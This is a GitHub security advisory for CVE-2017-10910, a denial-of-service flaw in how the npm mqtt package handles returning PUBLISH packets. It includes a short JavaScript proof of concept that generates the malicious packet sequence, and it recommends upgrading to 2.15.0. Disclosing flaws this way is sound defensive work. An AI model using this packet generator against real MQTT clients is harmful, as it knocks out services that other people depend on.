Skip to content

Denial of Service in mqtt

Moderate severity GitHub Reviewed Published Dec 28, 2017 to the GitHub Advisory Database • Updated Jan 9, 2023

Package

npm mqtt (npm)

Affected versions

>= 2.0.0, < 2.15.0

Patched versions

2.15.0

Description

Affected versions of mqtt do not properly handle PUBLISH packets returning from the server, leading to a Denial of Service condition.

The vulnerability is completely mitigated if the only connected servers are trusted, guaranteed not to be under the control of a malicious actor.

Proof of Concept

The following is a demonstration of how to generate the malicious packet sequence, but does not include information on handling the initial network connections and MQTT overhead.

var mqttp = require('mqtt-packet');
var packets = [];
for(var i=0; i<=1000;i++){
    packets.push(
        mqttp.generate({
            cmd:'publish',
            topic:Buffer.from('hello'),
            payload:Buffer.from('world'),
            retain: false,
            dup: false, 
            messageId: ++i, 
            qos: 1
        })
    )
}

Recommendation

Update to version 2.15.0 or later.

References

Published to the GitHub Advisory Database Dec 28, 2017
Reviewed Jun 16, 2020
Last updated Jan 9, 2023

Severity

Moderate
6.5
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Weaknesses

CVE ID

CVE-2017-10910

GHSA ID

GHSA-h9mj-fghc-664w

Source code

Checking history
See something to contribute? Suggest improvements for this vulnerability.